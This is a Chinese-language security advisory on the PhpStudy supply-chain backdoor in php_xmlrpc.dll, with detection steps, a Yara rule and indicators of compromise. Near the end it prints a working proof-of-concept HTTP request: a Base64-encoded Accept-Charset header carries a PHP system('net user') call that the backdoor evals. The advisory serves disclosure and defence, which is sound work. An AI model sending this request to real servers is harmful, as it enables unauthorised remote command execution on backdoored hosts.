PhpStudy后门供应链攻击事件

事件背景

PhpStudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装，无需配置即可直接安装使用，具有PHP环境调试和PHP开发功能，在国内有着近百万PHP语言学习者、开发者用户。

 

近日，杭州公安报道了一起重大安全事件，杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果，其中涉及犯罪嫌疑人马某供述，其于2016年编写了“后门”，使用黑客手段非法侵入了PhpStudy软件官网，篡改了软件安装包内容。该“后门”无法被杀毒软件扫描删除，并且藏匿于软件某功能性代码中，极难被发现，可能影响数十万的PhpStudy软件安装实例。

 

经过专业团队的分析，确认被植入的后门代码不仅会连接远端的C&C服务器获取代码执行，甚至还允许在C&C服务器失效的情况下使攻击者无需任何用户验证提交命令远程被服务器执行。由于可能存在后门的软件的巨大部署量，造成非常现实的威胁，攻击者或了解命令执行细节的恶意人员甚至可能利用此后执行蠕虫式的传播攻击。

威胁描述

在对涉案存在后门的PhpStudy版本进行分析后，发现模块php_xmlrpc.dll中存在执行额外代码模块：

 

回连C&C：

 

除此以外，还有一个任意命令执行流程，后门代码会判断HTTP头的Accept-Encoding字段是否为”gzip,deflate “，如果是就执行这个流程，从Accept-Charset取出来的内容经过Base64解密后，然后eval执行起来：

 

下图为动态调试的截图：

 

构造POC如下，确认可以远程成功执行命令：

 

影响面评估

初步估计受后门影响的PhpStudy安装版本在十万级别，由于利用此后门可以非常直接地在服务器上执行任意命令，理论上可以进行蠕虫式的传播，构成非常现实的巨大威胁。

处置建议

POC

GET /index.php HTTP/1.1 Host: 192.168.0.121 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip,deflate Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw== Accept-Language: zh-CN,zh;q=0.9 Connection: close

 

自查方法

1. phpstudy的默认安装路径：C:\phpStudy

2、在相对路径下：C:\phpStudy\PHPTutorial\php\php-*\ext，把所有的php_xmlrpc.dll文件取出来，匹配文件中查找是否包含“@eval(”字符串，如果有的话则受后门影响。

3、可以用如下Yara规则对文件进行扫描：

rule PhpStudyGhost { meta:          filetype="Ghost"          description="PhpStudyGhost " strings:          $a1 = "@eval(%s('%s'));" condition:          any of ($a*) }

IOC

IP

133.130.101.150

 

Domain

360se.net

bbs.360se.net

www.360se.net

up.360se.net

down.360se.net

cms.360se.net

file.360se.net

ftp.360se.net

 

MD5

0f7ad38e7a9857523dfbce4bce43a9e9

参考资料

https://mp.weixin.qq.com/s/s-5cVTxIJcDfdRjtnEnI0g

https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw